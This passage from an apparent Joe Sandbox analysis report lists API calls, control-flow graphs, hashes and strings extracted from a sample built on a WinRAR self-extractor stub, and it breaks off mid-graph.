                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CDBC47
                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00CDBC6F
                                                                                                            • Sleep.KERNEL32(00000064), ref: 00CDBCB9
                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CDBCE2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00CDBCEB
                                                                                                            • _swprintf.LIBCMT ref: 00CDBD1E
                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBD7D
                                                                                                            • SetDlgItemTextW.USER32(?,00000065,00CF35F4), ref: 00CDBD94
                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00CDBD9D
                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDBDAC
                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CDBDBB
                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBE68
                                                                                                            • _wcslen.LIBCMT ref: 00CDBEBE
                                                                                                            • _swprintf.LIBCMT ref: 00CDBEE8
                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDBF32
                                                                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CDBF4C
                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 00CDBF55
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CDBF6B
                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 00CDBF85
                                                                                                            • SetWindowTextW.USER32(00000000,00D0A472), ref: 00CDBFA7
                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CDC007
                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC01A
                                                                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CDC0BD
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00CDC197
                                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CDC1D9
                                                                                                              • Part of subcall function 00CDC73F: __EH_prolog.LIBCMT ref: 00CDC744
                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC1FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                            • API String ID: 3445078344-311033401
                                                                                                            • Opcode ID: ed0ecb5a5d0a6588793da6d0269fd358d0d8ce1065af8473500451ad807c1ca6
                                                                                                            • Instruction ID: b02bda95bf7c78da842c67a684774b6dcab831cf87a6c31d76e57226e2214bea
                                                                                                            • Opcode Fuzzy Hash: ed0ecb5a5d0a6588793da6d0269fd358d0d8ce1065af8473500451ad807c1ca6
                                                                                                            • Instruction Fuzzy Hash: DE42F470944349BAEB21AB60DC8AFBE776CAB11700F00405AF758E63D2CB749E45EB71

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 268 cd0863-cd0886 call cdec50 GetModuleHandleW 271 cd0888-cd089f GetProcAddress 268->271 272 cd08e7-cd0b48 268->272 273 cd08b9-cd08c9 GetProcAddress 271->273 274 cd08a1-cd08b7 271->274 275 cd0b4e-cd0b59 call ce75fb 272->275 276 cd0c14-cd0c40 GetModuleFileNameW call ccc29a call cd0602 272->276 277 cd08cb-cd08e0 273->277 278 cd08e5 273->278 274->273 275->276 286 cd0b5f-cd0b8d GetModuleFileNameW CreateFileW 275->286 292 cd0c42-cd0c4e call ccb146 276->292 277->278 278->272 287 cd0b8f-cd0b9b SetFilePointer 286->287 288 cd0c08-cd0c0f CloseHandle 286->288 287->288 290 cd0b9d-cd0bb9 ReadFile 287->290 288->276 290->288 294 cd0bbb-cd0be0 290->294 297 cd0c7d-cd0ca4 call ccc310 GetFileAttributesW 292->297 298 cd0c50-cd0c5b call cd081b 292->298 296 cd0bfd-cd0c06 call cd0371 294->296 296->288 305 cd0be2-cd0bfc call cd081b 296->305 308 cd0cae 297->308 309 cd0ca6-cd0caa 297->309 298->297 307 cd0c5d-cd0c7b CompareStringW 298->307 305->296 307->297 307->309 312 cd0cb0-cd0cb5 308->312 309->292 311 cd0cac 309->311 311->312 313 cd0cec-cd0cee 312->313 314 cd0cb7 312->314 315 cd0dfb-cd0e05 313->315 316 cd0cf4-cd0d0b call ccc2e4 call ccb146 313->316 317 cd0cb9-cd0ce0 call ccc310 GetFileAttributesW 314->317 327 cd0d0d-cd0d6e call cd081b * 2 call cce617 call cc4092 call cce617 call cda7e4 316->327 328 cd0d73-cd0da6 call cc4092 AllocConsole 316->328 322 cd0cea 317->322 323 cd0ce2-cd0ce6 317->323 322->313 323->317 325 cd0ce8 323->325 325->313 334 cd0df3-cd0df5 ExitProcess 327->334 333 cd0da8-cd0ded GetCurrentProcessId AttachConsole call ce3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0B69
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD0B83
                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD0B93
                                                                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00CF3C7C,00000000), ref: 00CD0BB1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00CD0C09
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0C1E
                                                                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CF3C7C,?,00000000,?,00000800), ref: 00CD0C72
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00CF3C7C,00000800,?,00000000,?,00000800), ref: 00CD0C9C
                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00CF3D44,00000800), ref: 00CD0CD8
                                                                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                                                                            • _swprintf.LIBCMT ref: 00CD0D4A
                                                                                                            • _swprintf.LIBCMT ref: 00CD0D96
                                                                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                                                                            • AllocConsole.KERNEL32 ref: 00CD0D9E
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00CD0DA8
                                                                                                            • AttachConsole.KERNEL32(00000000), ref: 00CD0DAF
                                                                                                            • _wcslen.LIBCMT ref: 00CD0DC4
                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CD0DD5
                                                                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00CD0DDC
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00CD0DE7
                                                                                                            • FreeConsole.KERNEL32 ref: 00CD0DED
                                                                                                            • ExitProcess.KERNEL32 ref: 00CD0DF5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                            • API String ID: 1207345701-3298887752
                                                                                                            • Opcode ID: 54abafdbe20e90ec84e5d34637c08f693bfadec972dff4449f6c91ed416def6d
                                                                                                            • Instruction ID: 88fac597f94b39c890bacd6e7a90e1782c3308493ea4fed0ef081fe67e66b801
                                                                                                            • Opcode Fuzzy Hash: 54abafdbe20e90ec84e5d34637c08f693bfadec972dff4449f6c91ed416def6d
                                                                                                            • Instruction Fuzzy Hash: 09D152F14183C8BBDB659F54C849BAFBBE8AF85704F50491EF38596250CBB08649CB63

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 347 cdc73f-cdc757 call cdeb78 call cdec50 352 cdd40d-cdd418 347->352 353 cdc75d-cdc787 call cdb314 347->353 353->352 356 cdc78d-cdc792 353->356 357 cdc793-cdc7a1 356->357 358 cdc7a2-cdc7b7 call cdaf98 357->358 361 cdc7b9 358->361 362 cdc7bb-cdc7d0 call cd1fbb 361->362 365 cdc7dd-cdc7e0 362->365 366 cdc7d2-cdc7d6 362->366 368 cdd3d9-cdd404 call cdb314 365->368 369 cdc7e6 365->369 366->362 367 cdc7d8 366->367 367->368 368->357 380 cdd40a-cdd40c 368->380 371 cdc7ed-cdc7f0 369->371 372 cdca7c-cdca7e 369->372 373 cdca5f-cdca61 369->373 374 cdc9be-cdc9c0 369->374 371->368 379 cdc7f6-cdc850 call cda64d call ccbdf3 call cca544 call cca67e call cc6edb 371->379 372->368 377 cdca84-cdca8b 372->377 373->368 376 cdca67-cdca77 SetWindowTextW 373->376 374->368 378 cdc9c6-cdc9d2 374->378 376->368 377->368 381 cdca91-cdcaaa 377->381 382 cdc9d4-cdc9e5 call ce7686 378->382 383 cdc9e6-cdc9eb 378->383 435 cdc98f-cdc9a4 call cca5d1 379->435 380->352 385 cdcaac 381->385 386 cdcab2-cdcac0 call ce3e13 381->386 382->383 389 cdc9ed-cdc9f3 383->389 390 cdc9f5-cdca00 call cdb48e 383->390 385->386 386->368 404 cdcac6-cdcacf 386->404 391 cdca05-cdca07 389->391 390->391 397 cdca09-cdca10 call ce3e13 391->397 398 cdca12-cdca32 call ce3e13 call ce3e3e 391->398 397->398 424 cdca4b-cdca4d 398->424 425 cdca34-cdca3b 398->425 408 cdcaf8-cdcafb 404->408 409 cdcad1-cdcad5 404->409 411 cdcb01-cdcb04 408->411 413 cdcbe0-cdcbee call cd0602 408->413 410 cdcad7-cdcadf 409->410 409->411 410->368 416 cdcae5-cdcaf3 call cd0602 410->416 418 cdcb06-cdcb0b 411->418 419 cdcb11-cdcb2c 411->419 426 cdcbf0-cdcc04 call ce279b 413->426 416->426 418->413 418->419 436 cdcb2e-cdcb68 419->436 437 cdcb76-cdcb7d 419->437 424->368 427 cdca53-cdca5a call ce3e2e 424->427 431 cdca3d-cdca3f 425->431 432 cdca42-cdca4a call ce7686 425->432 446 cdcc06-cdcc0a 426->446 447 cdcc11-cdcc62 call cd0602 call cdb1be GetDlgItem SetWindowTextW SendMessageW call ce3e49 426->447 427->368 431->432 432->424 453 cdc9aa-cdc9b9 call cca55a 435->453 454 cdc855-cdc869 SetFileAttributesW 435->454 470 cdcb6c-cdcb6e 436->470 471 cdcb6a 436->471 440 cdcb7f-cdcb97 call ce3e13 437->440 441 cdcbab-cdcbce call ce3e13 * 2 437->441 440->441 457 cdcb99-cdcba6 call cd05da 440->457 441->426 475 cdcbd0-cdcbde call cd05da 441->475 446->447 452 cdcc0c-cdcc0e 446->452 481 cdcc67-cdcc6b 447->481 452->447 453->368 459 cdc90f-cdc91f GetFileAttributesW 454->459 460 cdc86f-cdc8a2 call ccb991 call ccb690 call ce3e13 454->460 457->441 459->435 468 cdc921-cdc930 DeleteFileW 459->468 491 cdc8b5-cdc8c3 call ccbdb4 460->491 492 cdc8a4-cdc8b3 call ce3e13 460->492 468->435 474 cdc932-cdc935 468->474 470->437 471->470 478 cdc939-cdc965 call cc4092 GetFileAttributesW 474->478 475->426 487 cdc937-cdc938 478->487 488 cdc967-cdc97d MoveFileW 478->488 481->368 486 cdcc71-cdcc85 SendMessageW 481->486 486->368 487->478 488->435 490 cdc97f-cdc989 MoveFileExW 488->490 490->435 491->453 497 cdc8c9-cdc908 call ce3e13 call cdfff0 491->497 492->491 492->497 497->459
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CDC744
                                                                                                              • Part of subcall function 00CDB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CDB3FB
                                                                                                            • _wcslen.LIBCMT ref: 00CDCA0A
                                                                                                            • _wcslen.LIBCMT ref: 00CDCA13
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00CDCA71
                                                                                                            • _wcslen.LIBCMT ref: 00CDCAB3
                                                                                                            • _wcsrchr.LIBVCRUNTIME ref: 00CDCBFB
                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 00CDCC36
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00CDCC46
                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,00D0A472), ref: 00CDCC54
                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CDCC7F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                            • API String ID: 2804936435-312220925
                                                                                                            • Opcode ID: 7ced57b9d40a36eb31721d8d7fb1a1b314e661118f840360119377b285b5e9f4
                                                                                                            • Instruction ID: ad2e6d5ee8039148ba8fc4a5a06468c1bedcf734e20bb20036a211b9adc8f1be
                                                                                                            • Opcode Fuzzy Hash: 7ced57b9d40a36eb31721d8d7fb1a1b314e661118f840360119377b285b5e9f4
                                                                                                            • Instruction Fuzzy Hash: 68E160B2900259AADB25DBA4DD85EEE73BCAB04310F0040A7F719E7250EF749F85DB61
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00CCDA70
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CCDAAC
                                                                                                              • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                                                                              • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010424), ref: 00CD1BA0
                                                                                                            • _wcslen.LIBCMT ref: 00CCDDE9
                                                                                                            • __fprintf_l.LIBCMT ref: 00CCDF1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                            • API String ID: 566448164-801612888
                                                                                                            • Opcode ID: b05fcc5c1feb721a29d01d870c6cc558f2cd1a78ad2a72b3ad9598002f197d52
                                                                                                            • Instruction ID: 8bef2f5362f6f36bed33b5595a108d5226be16f9609852e2329ae2571c6bf6c3
                                                                                                            • Opcode Fuzzy Hash: b05fcc5c1feb721a29d01d870c6cc558f2cd1a78ad2a72b3ad9598002f197d52
                                                                                                            • Instruction Fuzzy Hash: 9132D071900258ABCF24EF68C845FEE77A5EF15300F44016EFA1697281EBB1EE85DB90

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010424,?), ref: 00CDB59E
                                                                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                                                                            • GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                            • String ID: \
                                                                                                            • API String ID: 3569833718-2967466578
                                                                                                            • Opcode ID: 7d86186b3679ead23179c5a4a700dae95e8f7a1d489150ade7fcecd5d7506b91
                                                                                                            • Instruction ID: b104c5dd5367a065df885a9e2dbee3cc7c74aa920c3ff34c4f8f515408fc272f
                                                                                                            • Opcode Fuzzy Hash: 7d86186b3679ead23179c5a4a700dae95e8f7a1d489150ade7fcecd5d7506b91
                                                                                                            • Instruction Fuzzy Hash: 7331E271145342BFE311DF20EC4AFAB7FACEB96704F000519F691D63A0EB688A058B76

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 836 cdd78f-cdd7a7 call cdec50 839 cdd7ad-cdd7b9 call ce3e13 836->839 840 cdd9e8-cdd9f0 836->840 839->840 843 cdd7bf-cdd7e7 call cdfff0 839->843 846 cdd7e9 843->846 847 cdd7f1-cdd7ff 843->847 846->847 848 cdd801-cdd804 847->848 849 cdd812-cdd818 847->849 850 cdd808-cdd80e 848->850 851 cdd85b-cdd85e 849->851 853 cdd837-cdd844 850->853 854 cdd810 850->854 851->850 852 cdd860-cdd866 851->852 855 cdd86d-cdd86f 852->855 856 cdd868-cdd86b 852->856 858 cdd84a-cdd84e 853->858 859 cdd9c0-cdd9c2 853->859 857 cdd822-cdd82c 854->857 860 cdd882-cdd898 call ccb92d 855->860 861 cdd871-cdd878 855->861 856->855 856->860 862 cdd82e 857->862 863 cdd81a-cdd820 857->863 864 cdd854-cdd859 858->864 865 cdd9c6 858->865 859->865 872 cdd89a-cdd8a7 call cd1fbb 860->872 873 cdd8b1-cdd8bc call cca231 860->873 861->860 866 cdd87a 861->866 862->853 863->857 868 cdd830-cdd833 863->868 864->851 869 cdd9cf 865->869 866->860 868->853 871 cdd9d6-cdd9d8 869->871 874 cdd9da-cdd9dc 871->874 875 cdd9e7 871->875 872->873 883 cdd8a9 872->883 881 cdd8be-cdd8d5 call ccb6c4 873->881 882 cdd8d9-cdd8e6 ShellExecuteExW 873->882 874->875 878 cdd9de-cdd9e1 ShowWindow 874->878 875->840 878->875 881->882 882->875 885 cdd8ec-cdd8f9 882->885 883->873 887 cdd90c-cdd90e 885->887 888 cdd8fb-cdd902 885->888 890 cdd925-cdd944 call cddc3b 887->890 891 cdd910-cdd919 887->891 888->887 889 cdd904-cdd90a 888->889 889->887 892 cdd97b-cdd987 CloseHandle 889->892 890->892 904 cdd946-cdd94e 890->904 891->890 899 cdd91b-cdd923 ShowWindow 891->899 893 cdd989-cdd996 call cd1fbb 892->893 894 cdd998-cdd9a6 892->894 893->869 893->894 894->871 898 cdd9a8-cdd9aa 894->898 898->871 903 cdd9ac-cdd9b2 898->903 899->890 903->871 905 cdd9b4-cdd9be 903->905 904->892 906 cdd950-cdd961 GetExitCodeProcess 904->906 905->871 906->892 907 cdd963-cdd96d 906->907 908 cdd96f 907->908 909 cdd974 907->909 908->909 909->892
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00CDD7AE
                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00CDD8DE
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00CDD91D
                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00CDD959
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00CDD97F
                                                                                                            • ShowWindow.USER32(?,00000001), ref: 00CDD9E1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                            • String ID: .exe$.inf
                                                                                                            • API String ID: 36480843-3750412487
                                                                                                            • Opcode ID: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                                                                            • Instruction ID: 1525631867463765d6fb796b0d1692b15002b5d3019f9c281ffe5244e3842a1b
                                                                                                            • Opcode Fuzzy Hash: 87453b002db86c40a659e2c800f7ef342ebe0ee506f426d07a54be5e5bc56c3b
                                                                                                            • Instruction Fuzzy Hash: FE51C370808380AAD7319F64A854BBBBBE4AF41744F04041FF7D6973A1DB729B85D762

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 910 cea95b-cea974 911 cea98a-cea98f 910->911 912 cea976-cea986 call ceef4c 910->912 914 cea99c-cea9c0 MultiByteToWideChar 911->914 915 cea991-cea999 911->915 912->911 920 cea988 912->920 917 cea9c6-cea9d2 914->917 918 ceab53-ceab66 call cdfbbc 914->918 915->914 921 ceaa26 917->921 922 cea9d4-cea9e5 917->922 920->911 926 ceaa28-ceaa2a 921->926 923 cea9e7-cea9f6 call cf2010 922->923 924 ceaa04-ceaa15 call ce8e06 922->924 929 ceab48 923->929 935 cea9fc-ceaa02 923->935 924->929 936 ceaa1b 924->936 926->929 930 ceaa30-ceaa43 MultiByteToWideChar 926->930 934 ceab4a-ceab51 call ceabc3 929->934 930->929 933 ceaa49-ceaa5b call ceaf6c 930->933 940 ceaa60-ceaa64 933->940 934->918 939 ceaa21-ceaa24 935->939 936->939 939->926 940->929 942 ceaa6a-ceaa71 940->942 943 ceaaab-ceaab7 942->943 944 ceaa73-ceaa78 942->944 946 ceaab9-ceaaca 943->946 947 ceab03 943->947 944->934 945 ceaa7e-ceaa80 944->945 945->929 948 ceaa86-ceaaa0 call ceaf6c 945->948 950 ceaacc-ceaadb call cf2010 946->950 951 ceaae5-ceaaf6 call ce8e06 946->951 949 ceab05-ceab07 947->949 948->934 962 ceaaa6 948->962 953 ceab09-ceab22 call ceaf6c 949->953 954 ceab41-ceab47 call ceabc3 949->954 950->954 965 ceaadd-ceaae3 950->965 951->954 966 ceaaf8 951->966 953->954 968 ceab24-ceab2b 953->968 954->929 962->929 967 ceaafe-ceab01 965->967 966->967 967->949 969 ceab2d-ceab2e 968->969 970 ceab67-ceab6d 968->970 971 